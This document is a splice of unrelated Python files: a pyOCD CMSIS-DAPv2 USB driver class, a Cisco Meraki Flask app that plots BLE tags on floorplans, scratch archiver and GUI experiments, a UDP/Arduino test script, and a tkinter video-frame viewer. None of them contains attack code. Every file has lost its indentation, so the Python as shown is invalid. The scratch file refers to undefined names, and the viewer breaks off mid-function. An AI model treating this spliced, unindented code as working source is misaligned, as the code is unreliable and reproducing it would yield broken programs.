# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .interface import Interface
from .common import (USB_CLASS_VENDOR_SPECIFIC, filter_device_by_class, is_known_cmsis_dap_vid_pid)
from ..dap_access_api import DAPAccessIntf
from ... import common
import logging
import os
import threading
import six
from time import sleep
import errno
import platform
LOG = logging.getLogger(__name__)
try:
import usb.core
import usb.util
except ImportError:
IS_AVAILABLE = False
else:
IS_AVAILABLE = True
class PyUSBv2(Interface):
"""!
@brief CMSIS-DAPv2 interface using pyUSB.
"""
isAvailable = IS_AVAILABLE
def __init__(self):
super(PyUSBv2, self).__init__()
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.serial_number = None
self.kernel_driver_was_attached = False
self.closed = True
self.thread = None
self.rx_stop_event = None
self.swo_thread = None
self.swo_stop_event = None
self.rcv_data = []
self.swo_data = []
self.read_sem = threading.Semaphore(0)
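        # read_sem pairs each command written on the OUT endpoint with exactly one read performed by
        # the RX thread, so the IN endpoint is only read when a response is expected.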
self.packet_size = 512
self.is_swo_running = False
@property
def has_swo_ep(self):
return self.ep_swo is not None
def open(self):
assert self.closed is True
# Get device handle
dev = usb.core.find(custom_match=HasCmsisDapv2Interface(self.serial_number))
if dev is None:
raise DAPAccessIntf.DeviceError("Device %s not found" %
self.serial_number)
# get active config
config = dev.get_active_configuration()
# Get CMSIS-DAPv2 interface
interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_interface)
if interface is None:
raise DAPAccessIntf.DeviceError("Device %s has no CMSIS-DAPv2 interface" %
self.serial_number)
interface_number = interface.bInterfaceNumber
# Find endpoints. CMSIS-DAPv2 endpoints are in a fixed order.
try:
ep_out = interface.endpoints()[0]
ep_in = interface.endpoints()[1]
ep_swo = interface.endpoints()[2] if len(interface.endpoints()) > 2 else None
except IndexError:
raise DAPAccessIntf.DeviceError("CMSIS-DAPv2 device %s is missing endpoints" %
self.serial_number)
# Explicitly claim the interface
try:
usb.util.claim_interface(dev, interface_number)
except usb.core.USBError as exc:
raise six.raise_from(DAPAccessIntf.DeviceError("Unable to open device"), exc)
# Update all class variables if we made it here
self.ep_out = ep_out
self.ep_in = ep_in
self.ep_swo = ep_swo
self.dev = dev
self.intf_number = interface_number
# Start RX thread as the last step
self.closed = False
self.start_rx()
def start_rx(self):
# Flush the RX buffers by reading until timeout exception
try:
while True:
self.ep_in.read(self.ep_in.wMaxPacketSize, 1)
except usb.core.USBError:
# USB timeout expected
pass
# Start RX thread
self.rx_stop_event = threading.Event()
thread_name = "CMSIS-DAP receive (%s)" % self.serial_number
self.thread = threading.Thread(target=self.rx_task, name=thread_name)
self.thread.daemon = True
self.thread.start()
def start_swo(self):
self.swo_stop_event = threading.Event()
thread_name = "SWO receive (%s)" % self.serial_number
self.swo_thread = threading.Thread(target=self.swo_rx_task, name=thread_name)
self.swo_thread.daemon = True
self.swo_thread.start()
self.is_swo_running = True
def stop_swo(self):
self.swo_stop_event.set()
self.swo_thread.join()
self.swo_thread = None
self.swo_stop_event = None
self.is_swo_running = False
def rx_task(self):
try:
while not self.rx_stop_event.is_set():
self.read_sem.acquire()
if not self.rx_stop_event.is_set():
self.rcv_data.append(self.ep_in.read(self.ep_in.wMaxPacketSize, 10 * 1000))
finally:
# Set last element of rcv_data to None on exit
self.rcv_data.append(None)
def swo_rx_task(self):
try:
while not self.swo_stop_event.is_set():
try:
self.swo_data.append(self.ep_swo.read(self.ep_swo.wMaxPacketSize, 10 * 1000))
except usb.core.USBError:
pass
finally:
# Set last element of swo_data to None on exit
self.swo_data.append(None)
@staticmethod
def get_all_connected_interfaces():
"""! @brief Returns all the connected devices with a CMSIS-DAPv2 interface."""
# find all cmsis-dap devices
try:
all_devices = usb.core.find(find_all=True, custom_match=HasCmsisDapv2Interface())
except usb.core.NoBackendError:
common.show_no_libusb_warning()
return []
# iterate on all devices found
boards = []
for board in all_devices:
new_board = PyUSBv2()
new_board.vid = board.idVendor
new_board.pid = board.idProduct
new_board.product_name = board.product
new_board.vendor_name = board.manufacturer
new_board.serial_number = board.serial_number
boards.append(new_board)
return boards
def write(self, data):
"""! @brief Write data on the OUT endpoint."""
report_size = self.packet_size
if self.ep_out:
report_size = self.ep_out.wMaxPacketSize
for _ in range(report_size - len(data)):
data.append(0)
self.read_sem.release()
self.ep_out.write(data)
#logging.debug('sent: %s', data)
def read(self):
"""! @brief Read data on the IN endpoint."""
while len(self.rcv_data) == 0:
sleep(0)
if self.rcv_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s read thread exited unexpectedly" % self.serial_number)
return self.rcv_data.pop(0)
def read_swo(self):
# Accumulate all available SWO data.
data = bytearray()
while len(self.swo_data):
if self.swo_data[0] is None:
raise DAPAccessIntf.DeviceError("Device %s SWO thread exited unexpectedly" % self.serial_number)
data += self.swo_data.pop(0)
return data
def set_packet_count(self, count):
# No interface level restrictions on count
self.packet_count = count
def set_packet_size(self, size):
self.packet_size = size
def get_serial_number(self):
return self.serial_number
def close(self):
"""! @brief Close the USB interface."""
assert self.closed is False
if self.is_swo_running:
self.stop_swo()
self.closed = True
self.rx_stop_event.set()
self.read_sem.release()
self.thread.join()
assert self.rcv_data[-1] is None
self.rcv_data = []
self.swo_data = []
usb.util.release_interface(self.dev, self.intf_number)
usb.util.dispose_resources(self.dev)
self.ep_out = None
self.ep_in = None
self.ep_swo = None
self.dev = None
self.intf_number = None
self.thread = None
def _check_ep(interface, ep_index, ep_dir, ep_type):
"""! @brief Tests an endpoint type and direction."""
ep = interface[ep_index]
return (usb.util.endpoint_direction(ep.bEndpointAddress) == ep_dir) \
and (usb.util.endpoint_type(ep.bmAttributes) == ep_type)
def _match_cmsis_dap_interface(interface):
"""! @brief Returns true for a CMSIS-DAP v2 interface.
This match function performs several tests on the provided USB interface descriptor, to
determine whether it is a CMSIS-DAPv2 interface. These requirements must be met by the
interface:
1. Have an interface name string containing "CMSIS-DAP".
2. bInterfaceClass must be 0xff.
3. bInterfaceSubClass must be 0.
4. Must have bulk out and bulk in endpoints, with an optional extra bulk in endpoint, in
that order.
"""
try:
interface_name = usb.util.get_string(interface.device, interface.iInterface)
# This tells us whether the interface is CMSIS-DAP, but not whether it's v1 or v2.
if (interface_name is None) or ("CMSIS-DAP" not in interface_name):
return False
# Now check the interface class to distinguish v1 from v2.
if (interface.bInterfaceClass != USB_CLASS_VENDOR_SPECIFIC) \
or (interface.bInterfaceSubClass != 0):
return False
# Must have either 2 or 3 endpoints.
if interface.bNumEndpoints not in (2, 3):
return False
# Endpoint 0 must be bulk out.
if not _check_ep(interface, 0, usb.util.ENDPOINT_OUT, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 1 must be bulk in.
if not _check_ep(interface, 1, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# Endpoint 2 is optional. If present it must be bulk in.
if (interface.bNumEndpoints == 3) \
and not _check_ep(interface, 2, usb.util.ENDPOINT_IN, usb.util.ENDPOINT_TYPE_BULK):
return False
# All checks passed, this is a CMSIS-DAPv2 interface!
return True
except (UnicodeDecodeError, IndexError):
# UnicodeDecodeError exception can be raised if the device has a corrupted interface name.
# Certain versions of STLinkV2 are known to have this problem. If we can't read the
# interface name, there's no way to tell if it's a CMSIS-DAPv2 interface.
#
# IndexError can be raised if an endpoint is missing.
return False
class HasCmsisDapv2Interface(object):
"""! @brief CMSIS-DAPv2 match class to be used with usb.core.find"""
def __init__(self, serial=None):
"""! @brief Create a new FindDap object with an optional serial number"""
self._serial = serial
def __call__(self, dev):
"""! @brief Return True if this is a CMSIS-DAPv2 device, False otherwise"""
# Check if the device class is a valid one for CMSIS-DAP.
if filter_device_by_class(dev.idVendor, dev.idProduct, dev.bDeviceClass):
return False
try:
config = dev.get_active_configuration()
cmsis_dap_interface = usb.util.find_descriptor(config, custom_match=_match_cmsis_dap_interface)
except usb.core.USBError as error:
# Produce a more helpful error message if we get a permissions error on Linux.
if error.errno == errno.EACCES and platform.system() == "Linux" \
and common.should_show_libusb_device_error((dev.idVendor, dev.idProduct)):
msg = ("%s while trying to interrogate a USB device "
"(VID=%04x PID=%04x). This can probably be remedied with a udev rule. "
"See <https://github.com/mbedmicro/pyOCD/tree/master/udev> for help." %
(error, dev.idVendor, dev.idProduct))
# If we recognize this device as one that should be CMSIS-DAP, we can raise
# the level of the log message since it's almost certainly a permissions issue.
if is_known_cmsis_dap_vid_pid(dev.idVendor, dev.idProduct):
LOG.warning(msg)
else:
LOG.debug(msg)
return False
except (IndexError, NotImplementedError, ValueError) as error:
return False
if cmsis_dap_interface is None:
return False
if self._serial is not None:
if self._serial != dev.serial_number:
return False
return True
|
app.py
|
""" Copyright (c) 2022 Cisco and/or its affiliates.
This software is licensed to you under the terms of the Cisco Sample
Code License, Version 1.1 (the "License"). You may obtain a copy of the
License at
https://developer.cisco.com/docs/licenses
All use of the material herein must be in accordance with the terms of
the License. All rights not expressly granted by the License are
reserved. Unless required by applicable law or agreed to separately in
writing, software distributed under the License is distributed on an "AS
IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
or implied.
"""
import datetime
import json
import logging
import os
import threading
from datetime import datetime
from time import sleep
import meraki
import requests
from dotenv import load_dotenv
from flask import Flask, Response, redirect, render_template, request, url_for
from PIL import Image, ImageDraw, ImageFont
log = logging.getLogger(__name__)
logging.basicConfig(level=os.environ.get("LOGLEVEL", "INFO"))
# REQUIRED CONFIG VALUES:
MERAKI_VALIDATION_KEY = ""
MERAKI_LOCATION_DATA_SECRET = ""
# OPTIONAL CONFIG VALUES
FILTER_BLE_TAGS = False
# If FILTER_BLE_TAGS is True, then BLE_UUID_FILTER must be set
BLE_UUID_FILTER = ""
SUPPRESS_MERAKI_LOGGING = True
FONT_SIZE = 10
# Load all environment variables
load_dotenv()
app = Flask(__name__)
dashboard = meraki.DashboardAPI(suppress_logging=SUPPRESS_MERAKI_LOGGING)
# Global variables
meraki_networks = {}
network_floorplans = {}
last_meraki_update = "Never"
# Index Page with links to each Meraki Network
@app.route("/", methods=["GET"])
def index():
return render_template(
"index.html",
hiddenLinks=False,
networks=meraki_networks,
last_update=last_meraki_update,
)
# Display Network Map for specified Meraki network ID
@app.route("/<network_id>", methods=["GET"])
def floorplan(network_id):
floorplan_list = network_floorplans[network_id]
return render_template(
"floorplan.html",
hiddenLinks=False,
networks=meraki_networks,
floorplans=floorplan_list,
)
# Meraki Scanning API Listener
@app.route("/location_info", methods=["GET", "POST"])
def location_info():
global last_meraki_update
# Meraki Dashboard will send location payloads via POST request
if request.method == "POST":
# Store Location JSON payload
location_data = request.json
print(location_data)
try:
# Validate that API Secret configured in Meraki Dashboard
# matches what is being sent to us.
if location_data["secret"] == MERAKI_LOCATION_DATA_SECRET:
# This application was written for version 3.x of the Meraki Scanning API
# schema, and will not work with prior versions
if not "3" in location_data["version"]:
log.error("Please set API Version to 3.0 in Meraki Dashboard")
return Response(
'{"error": "API version not 3.x"}',
status=400,
mimetype="application/json",
)
# Count number of unique BLE tags that were sent in the location payload
ble_count = len(location_data["data"]["observations"])
log.info(
f"Received location payload from Meraki Dashboard, containing {ble_count} BLE devices"
)
# Meraki Dashboard will track the responsiveness of our Scanning API listener
# If responses take too long, Meraki may assume our listener is dead.
                # So we'll spin off the map-updating function to its own thread &
# continue on to respond quickly to the POST from Meraki with a 202
thread = threading.Thread(
target=updateMaps, args=(location_data["data"],)
)
thread.start()
# Update 'Last Updated' on main page
                last_meraki_update = datetime.now().strftime("%a %b %d %Y, %I:%M%p")
return Response(status=202)
else:
# If API Secret does not match, return 401 & error message
log.warning("Received bad payload secret from Meraki Dashboard")
return Response(
'{"error": "Incorrect payload secret"}',
status=401,
mimetype="application/json",
)
except TypeError:
# If we're not able to parse the data payload, return a 400 error
return Response(
'{"error": "Wrong data format"}',
status=400,
mimetype="application/json",
)
else:
# On first creation of Scanning API POST target, Meraki Cloud will send a GET
# to validate the correct destination. We must reply with the validation key
# that Meraki Dashboard provides
log.info("Got validation request from Meraki Dashboard.")
return MERAKI_VALIDATION_KEY
# Pre-launch setup
@app.before_first_request
def setup():
"""
Prep local data prior to spinning up flask web UI
"""
log.warning("Performing initial setup. Web UI may not be available yet...")
# Pull down list of Meraki networks & store to build web UI links
getMerakiNetworks()
# Pull down original copies of floor plans for each network
downloadFloorPlans()
log.warning("Setup Complete! Starting Web UI...")
def updateMaps(ble_data):
"""
This function takes in a data payload from Meraki Dashboard, which
contains JSON list of BLE tags, location info, and AP/floorplan info
In this function, we will open each network floorplan image, then
update the image with text/icons to show where each AP/BLE tag
is located. Afterwards, the modified image is saved & sent to the web UI
"""
# Pull in globals, which contain our dict of Meraki networks & floorplans
global network_floorplans
# Since some BLE tags may not have accurate location info, we can still
# place tags next to nearest AP. So we will store the location info for
# each AP on the map
ap_locations = {}
log.info("Beginning map update...")
font = ImageFont.truetype("./static/fonts/Roboto-Regular.ttf", FONT_SIZE)
# Each network ID may contain multiple floormaps, so here we will iterate
# through each floormap for a given network ID
for map in network_floorplans[ble_data["networkId"]]:
log.info(f"Updating {map}")
# Pull current file name from our floorplan dictionary
filename = f"{network_floorplans[ble_data['networkId']][map]['filename']}"
# We will always copy the original, unmodified image to edit.
# If not, we would be overwriting on top of an already modified image.
# Modified images start with "ble-", so we can easily strip that here to
# get the original image name
source_image = f"./static/floorplans/{filename.split('ble-')[-1]}"
# Open image file for editing
with Image.open(source_image) as floorplan:
# Due to the way Meraki handles x,y coordinates (explained below),
# We need to pull out the image resolution & floorplan dimensions
image_w, image_h = floorplan.size
floorplan_w = network_floorplans[ble_data["networkId"]][map]["width"]
floorplan_h = network_floorplans[ble_data["networkId"]][map]["height"]
floorplan = floorplan.convert("RGB")
draw = ImageDraw.Draw(floorplan)
# Add APs to map - this will be any AP that has reported a BLE location
for ap in ble_data["reportingAps"]:
                # Store the MAC in case we need to tie a BLE tag to its nearest AP later
ap_locations[ap["mac"]] = {}
# Reporting APs will list ALL APs in the network, so filter out which
# are not located on the floor we are working on right now
if ap["floorPlan"]["name"] == map:
# Meraki location data x,y values are in meters, but image
# is in pixel resolution.
# So we divide AP location (meters) by floorplan width/height (meters)
# and apply that ratio to image resolution height/width
# to get a rough estimate of where the AP is placed on the map
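                    # For example (hypothetical numbers): an AP placed at x = 10 m on a
                    # 40 m wide floorplan whose image is 2000 px wide lands at
                    # 2000 * (10 / 40) = 500 px from the left edge of the image.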
width_ratio = ap["floorPlan"]["x"] / floorplan_w
height_ratio = ap["floorPlan"]["y"] / floorplan_h
ap_x = image_w * width_ratio
ap_y = image_h * height_ratio
# Store AP x,y for any BLE tags that only report nearest AP
ap_locations[ap["mac"]]["x"] = ap_x
ap_locations[ap["mac"]]["y"] = ap_y
log.info(f"Adding APs to {map}")
# We will draw a small square at the exact coordinates, with AP name
# written next to it
draw.rectangle((ap_x, ap_y, ap_x + 5, ap_y + 5), fill=(35, 58, 235))
draw.text(
(ap_x + 7, ap_y), str(ap["name"]), (35, 58, 235), font=font
)
# Add BLE tags to map
# last_offset stores where the last text was placed.
# So by default, we would move the text 12px underneath
# the AP name so they don't overlap. Then continue
# incrementing by 12 for each additional device near that AP
last_offset = 12
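            # For example (hypothetical): three tags that only report the same nearest AP
            # get drawn at +12, +24 and +36 px below that AP's name, so their labels don't overlap.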
for device in ble_data["observations"]:
try:
# Not all BLE tag types will advertise a UUID
# But if the tag does then we will store it to display
device_uuid = device["bleBeacons"][0]["uuid"]
                except (KeyError, IndexError):
                    device_uuid = ""
try:
bleType = device['bleBeacons'][0]['bleType']
                except (KeyError, IndexError):
bleType = "Unknown"
# We can optionally filter out tags that don't match a certain UUID
# So if filtering is enabled, we will check that here
                if FILTER_BLE_TAGS and BLE_UUID_FILTER not in device_uuid:
log.info("Skipping tag due to UUID filter.")
continue
# Construct text label to be displayed on map image
ble_label = f"{device['name']} - {bleType}\n{device_uuid}"
if len(device["locations"]) > 0:
# If devices cannot be triangulated, no location info is provided
# With Meraki API v3, accurate location info is only provided if the
# tag is heard by 3 or more APs.
# Otherwise, we will only be told the single nearest AP
if device["locations"][0]["floorPlan"]["name"] == map:
ble_color = (212, 134, 44)
width_ratio = (
device["locations"][0]["floorPlan"]["x"] / floorplan_w
)
height_ratio = (
device["locations"][0]["floorPlan"]["y"] / floorplan_h
)
ble_x = image_w * width_ratio
ble_y = image_h * height_ratio
else:
# If no exact location info, place device near closest AP
try:
# This will only work if the BLE beacon is near an AP on the current floor map
# being edited.
# We have no way of knowing which map the BLE device is on - since that info is
# only provided if accurate location info is known.
ble_color = (35, 179, 30)
ble_x = (
ap_locations[device["latestRecord"]["nearestApMac"]]["x"]
+ 5
)
ble_y = (
ap_locations[device["latestRecord"]["nearestApMac"]]["y"]
+ last_offset
)
last_offset += 12
except KeyError:
# If we have no x,y then just continue to next device. This may occur if
# tag does not have any precise location info (we don't know which map it's on)
# but it's also not near any AP on this map
continue
log.info(
f"Adding BLE Device to map: {ble_label} at {ble_x}, {ble_y}"
)
try:
# Similar to AP, draw small square at precise location detected (or by nearest AP)
# then add label to the right of the square
draw.rectangle((ble_x, ble_y, ble_x + 5, ble_y + 5), fill=ble_color)
draw.text((ble_x + 7, ble_y), ble_label, ble_color, font=font)
except UnboundLocalError:
# BLE device can only be tied to a map if it contains precise location info
# If it doesn't, we use nearest AP MAC.
# However, we could be editing a map that doesn't match any of the info
# for the device we are trying to place - and therefore the ble_x / ble_y
# will never be set. So we catch that here & continue to next device
continue
# Update floorplan dictionary - which will adjust which image gets displayed in web UI
# If there is already a modified image (one starting with "ble-" prefix), then we
# will just overwrite & replace it here.
# Otherwise, use the new prefix for the filename & update our map dictionary
if not "ble" in filename:
destination_image = f"./static/floorplans/ble-{filename}"
network_floorplans[ble_data["networkId"]][map][
"filename"
] = f"ble-{filename}"
else:
destination_image = f"./static/floorplans/{filename}"
# Save the edited image
floorplan.save(destination_image)
# Finally, update the last updated time for all the map images
        now = datetime.now().strftime("%a %b %d %Y, %I:%M%p")
network_floorplans[ble_data["networkId"]][map]["lastupdate"] = now
def getMerakiNetworks():
"""
This function will just query the Meraki dashboard for all networks
and store each network ID & name in a global variable
"""
global meraki_networks
log.info("Querying list of all Meraki Networks....")
# Query list of organizations
org = dashboard.organizations.getOrganizations()
# Query all networks under the first organization we have access to
networks = dashboard.organizations.getOrganizationNetworks(org[0]["id"])
# Build dictionary of Meraki network ID & name
meraki_networks = {network["id"]: network["name"] for network in networks}
log.info(f"Found {len(meraki_networks.keys())} networks!")
def downloadFloorPlans():
"""
Function to download all Meraki floorplan images for each network in
the organization.
All files will be stored to the web-accessible directory:
./static/floorplans/
"""
global network_floorplans
log.info("Querying & downloading floorplans...")
# Iterate through each Meraki network to download floorplans
for network in meraki_networks:
# We will create a dictionary for each network ID
# that will contain info we need about that floorplan
network_floorplans[network] = {}
# Retrieve floorplan info
floorplans = dashboard.networks.getNetworkFloorPlans(network)
for floorplan in floorplans:
network_name = meraki_networks[network]
floorplan_url = floorplan["imageUrl"]
floorplan_name = floorplan["name"]
img_ext = floorplan["imageExtension"]
height = floorplan["height"]
width = floorplan["width"]
            # Build image name for when it is stored locally
download_name = f"{network_name} - {floorplan_name}.{img_ext}"
# Download image file
image_file = requests.get(floorplan_url)
# Write image to floorplan web directory
with open(f"./static/floorplans/{download_name}", "wb") as img:
img.write(image_file.content)
# Assemble dictionary of necessary attributes we will need later
network_floorplans[network][floorplan_name] = {}
network_floorplans[network][floorplan_name]["filename"] = download_name
network_floorplans[network][floorplan_name]["height"] = height
network_floorplans[network][floorplan_name]["width"] = width
network_floorplans[network][floorplan_name]["lastupdate"] = "Never"
log.info("Floorplans downloaded!")
if __name__ == "__main__":
app.run(debug=True)
|
scratch.py
|
from PIL import Image
# This was more about making the directory path and not building the plausible path
def get_destination_path(self):
while not self.cached_destination_path:
# sort out which root directory to use when searching for result
project_root_dir_prefix, project_num_prefix = ArchiverHelpers.prefixes_from_project_number(self.project_number)
root_directories_list = os.listdir(RECORDS_SERVER_LOCATION)
matching_root_dirs = [dir_name for dir_name in root_directories_list if
dir_name.lower().startswith(project_root_dir_prefix)]
# if we have more than one matching root dir we throw an error
if len(matching_root_dirs) != 1:
logging.exception(
f"{len(matching_root_dirs)} matching directories in {RECORDS_SERVER_LOCATION} for {self.project_number}",
exc_info=True)
return
new_path = os.path.join(RECORDS_SERVER_LOCATION, matching_root_dirs[0])
        # here we look for the directory that would contain the project directory
for root, dirs, files in os.walk(new_path):
if project_num_prefix in dirs:
new_path = os.path.join(root, project_num_prefix)
break
# if the project_num_prefix directory doesn't exist
        if project_num_prefix not in ArchiverHelpers.split_path(new_path):
new_path = os.path.join(new_path, project_num_prefix)
def test_assemble_destination_path():
project = '2700'
desired_destination = DIRECTORY_CHOICES[8]
print(desired_destination)
new_filename = "2744.G19.Notice of Completion"
location = os.path.join(os.getcwd(), "file_to_archive")
file = ArchivalFile(current_location_path=location, project=project, new_filename= new_filename,
destination_dir=desired_destination)
dest_path = file.assemble_destination_path()
print(dest_path)
def test_gui():
window_test = GuiHandler()
# welcome_res = window_test.make_window("Welcome", window_test.welcome_layout())
dest_layout = window_test.destination_choice_layout(dir_choices=DIRECTORY_CHOICES, default_project_num="3238",
file_exists_to_archive=True)
dest_results = window_test.make_window("Choose a file destination.", dest_layout)
fail_reason = "Could not find necessary sub-directories to reconcile desired destination path."
window_test.make_window("Could not archive file in desired destination.",
window_layout=window_test.failed_destination_layout(fail_reason, str(os.getcwd())))
def get_destination_filename(self):
"""
returns the resulting anticipated filename from an anticipated archival process. Handles extensions by copying
them from current filename to desired new filename
:return:
"""
    # subroutine to check the contents of the file's current location for files that can be archived
is_archivable_file = lambda filename, dir_path: (os.path.isfile(os.path.join(dir_path, filename)) and (
len([ignore_file for ignore_file in FILENAMES_TO_IGNORE if ignore_file.lower() == filename.lower()]) == 0))
#we assume there is only one matching file
current_filename = [file for file in os.listdir(self.current_path) if
is_archivable_file(file, self.current_path)][0]
if not self.new_filename:
return current_filename
extension = current_filename.split(".")[-1]
destination_filename = self.new_filename
split_filename = self.new_filename.split(".")
if split_filename[-1] == extension:
return destination_filename
split_filename.append(extension)
destination_filename = ".".join(split_filename)
return destination_filename
def resize_image(path, new_path, dims = (32,32)):
foo = Image.open(path)
foo2 = foo.resize(dims, Image.ANTIALIAS)
foo2.save(new_path, quality=95)
return
# First effort to make a gui run while the program does research
def async_research(self):
async def find_similar_files(archivist, a_filename):
        return archivist.researcher.similar_filename_paths(original_filename=a_filename, duration=6,
                                                           similarity_threshold=72, max_paths=7)
async def find_similar_dirs(archivist, dest):
return archivist.researcher.randomized_destination_examples(
dest_dir=dest)
async def make_gui_waiting_window(gui_handler: GuiHandler):
gui_handler.make_window("Occupied", window_layout= [[sg.Text("Performing Research")]])
async def perform_research(archivist : Archivist, archivist_file):
filename = ArchiverHelpers.split_path(archivist.file_to_archive.current_path)[-1]
dest = archivist.file_to_archive.destination_dir
similar_files_task = asyncio.loop.create_task(find_similar_files(archivist=archivist,a_filename=filename))
similar_dirs_task = asyncio.loop.create_task(find_similar_dirs(archivist=archivist, dest=dest))
gui_task = asyncio.loop.create_task(archivist.gui)
#second effort at a loading window during research process
def loading_window(self, name, layout, function):
def function_thread(window: sg.Window, the_function = function):
results = function()
window.write_event_value('-THREAD DONE-', '')
return results
def function_threading():
threading.Thread(target=function_thread, args=(window, function,), daemon=True).start()
print("function threaded")
window = sg.Window(name, layout,)
while True:
event, values = window.read()
function_threading()
if event == '-THREAD DONE-':
print("thread complete.")
break
window.close()
#third effort at a loading screen gui
def loading_window_during_func(self, func):
sg.theme(self.gui_theme)
layout = [[sg.Text("Performing Function. Please wait...")]]
window = sg.Window(title="Loading Window", layout=layout, enable_close_attempted_event= True)
with concurrent.futures.ThreadPoolExecutor() as executor:
window_results = executor.submit(window.read)
func_results = executor.submit(func)
if func_results:
window.close()
# 4th effort at loading screen
def loading_window_during_func(self, func):
sg.theme(self.gui_theme)
layout = [[sg.Text("Performing Function. Please wait...")]]
window = sg.Window(title="Loading Window", layout=layout, enable_close_attempted_event= True)
def window_looks_for_func_end():
while True:
event, values = window.read()
if event in ('-THREAD DONE-', sg.WIN_CLOSED):
window.close()
return
def alert_window_when_function_complete(function):
func_results = function()
window.write_event_value('-THREAD DONE-', '')
return func_results
with concurrent.futures.ThreadPoolExecutor() as executor:
window_results = executor.submit(window_looks_for_func_end)
func_results = executor.submit(alert_window_when_function_complete, [func])
|
test.py
|
from udp_arduino_server import wait_for_connection, server_sock, info
from threading import Thread
udp_thread = Thread(target=wait_for_connection)
udp_thread.start()
while True:
    cmd = input()
if cmd == 'exit': break
print(info)
|
main.py
|
import tkinter as tk
import threading
import imageio
import sys
from termcolor import colored
from PIL import Image, ImageTk
from time import time, sleep
import os
import tempfile
import ffmpy
import shutil
import gc
###############################################################################
# State parameters
###############################################################################
class Global():
def load(self, name):
videoName = name
fileExtension = os.path.splitext(videoName)[1].lower()
        if fileExtension not in ('.mp4', '.mpeg'):
print(os.path.realpath(__file__))
tempDir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'tempfiles')
tempFile = os.path.join(tempDir, 'temp.mp4')
if os.path.exists(tempDir): shutil.rmtree(tempDir)
os.mkdir(tempDir)
ff = ffmpy.FFmpeg(
executable = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'ffmpeg.exe'),
inputs = { videoName : None },
outputs = { tempFile : '-f mp4' }
)
ff.run()
video = imageio.get_reader(tempFile)
else:
video = imageio.get_reader(videoName)
meta = video.get_meta_data()
print(meta)
self.video = video
self.name = name
self.pause = False
self.cur = 0
self.fps = meta.get('fps')
self.size = meta.get('source_size')
self.duration = meta.get('duration')
self.name = os.path.basename(videoName)
self.step = 1
self.speed = 1.0
self.count = video.count_frames()
self.zoom = 1.0
if self.size[0] * self.size[1] > self.windowSize()[0] * self.windowSize()[1]:
self.zoom = 2
self.jumpRecord = ""
self.frameTimeCost = 0
self.prepared = 0
curSize = (round(g.size[0] / g.zoom), round(g.size[1] / g.zoom))
self.photoImages = [None for i in range(self.count)]
# for i in range(self.count):
# self.photoImages.append(ImageTk.PhotoImage(g.frames(i).resize(curSize, Image.ANTIALIAS)))
gc.collect(generation = 2)
if self.count > 1000: print(colored('WARNING: video too large.', 'red'))
print('Read')
print(colored(g.name, 'green'))
print('fps', colored(g.fps, 'yellow'))
def frames(self, index):
return Image.fromarray(self.video.get_data(index))
def viewSize(self):
return (self.view.winfo_width(), self.view.winfo_height())
def windowSize(self):
return (self.tk.winfo_width(), self.tk.winfo_height())
def mousePos(self):
        return (self.tk.winfo_pointerx() - self.tk.winfo_rootx(), self.tk.winfo_pointery() - self.tk.winfo_rooty())
def viewPos(self):
return (self.view.winfo_x() + self.viewSize()[0] // 2, self.view.winfo_y() + self.viewSize()[1] // 2)
def scaledSize(self):
return (max(1, round(self.size[0] / self.zoom)), max(1, round(self.size[1] / self.zoom)))
g = Global()
###############################################################################
###############################################################################
# Run
###############################################################################
def updateTitle():
g.tk.title("[%03d / %03d] [%.0f%%] [step %d] [scale %.4f] %s | [time %.4f] | %s" % (
g.cur + 1, g.count,
g.prepared / g.count * 100,
g.step,
g.zoom,
g.name,
g.frameTimeCost,
g.jumpRecord
))
def correctSize():
if g.scaledSize() != (g.photoImages[g.cur].width(), g.photoImages[g.cur].height()):
g.photoImages[g.cur] = ImageTk.PhotoImage(g.frames(g.cur).resize(g.scaledSize(), Image.ANTIALIAS))
gc.collect(generation = 1)
g.prepared += 1
def prepare():
if g.photoImages[g.cur] is None:
g.photoImages[g.cur] = ImageTk.PhotoImage(g.frames(g.cur).resize(g.scaledSize(), Image.ANTIALIAS))
g.prepared += 1
def setFrame():
beginTime = time()
prepare()
correctSize()
    imageObject = g.photoImages[g.cur] # tkinter image object.
if g.viewSize() != (imageObject.width(), imageObject.height()):
        g.view.config(image = imageObject) # set the widget's image.
    g.view.image = imageObject # attach the image (keeps a reference).
endTime = time()
g.frameTimeCost = endTime - beginTime
updateTitle()
return g.frameTimeCost
def nextFrame():
g.cur = g.cur + 1
if g.cur == g.count: g.cur = 0
setFrame()
def previousFrame():
g.cur = g.cur - 1
if g.cur < 0: g.cur = g.count - 1
setFrame()
def addStep():
g.step += 1
updateTitle()
def decStep():
g.step -= 1
if g.step == 0: g.step = 1
updateTitle()
def keyboardCallback(e):
# print(e)
if e.keysym.isdigit():
g.jumpRecord += e.keysym
updateTitle()
if e.keysym == 'Return' and g.jumpRecord != "":
jumpto = int(g.jumpRecord)
jumpto = min(g.count - 1, max(0, jumpto))
g.cur = jumpto
g.pause = True
g.jumpRecord = ""
setFrame()
if e.keysym == 'equal':
addStep()
if e.keysym == 'minus':
decStep()
if e.keysym == 'space':
g.pause = not g.pause
if e.keysym == 'Left' or e.keysym == 'a':
g.pause = True
for _ in range(g.step):
previousFrame()
if e.keysym == 'Right' or e.keysym == 'd' :
g.pause = True
for _ in range(g.step):
nextFrame()
if e.keysym == 'Up' or e.keysym == 'w':
g.pause = True
for _ in range(5 * g.step):
previousFrame()
if e.keysym == 'Down' or e.keysym == 's' :
g.pause = True
for _ in range(5 * g.step):
nextFrame()
if e.keysym == 'r':
g.zoom = 1
label.place(relx = 0.5, rely = 0.5, anchor = tk.CENTER)
def scrollCallback(e):
scale = e.delta // 120
rate = 0.9 ** scale
g.zoom *= rate
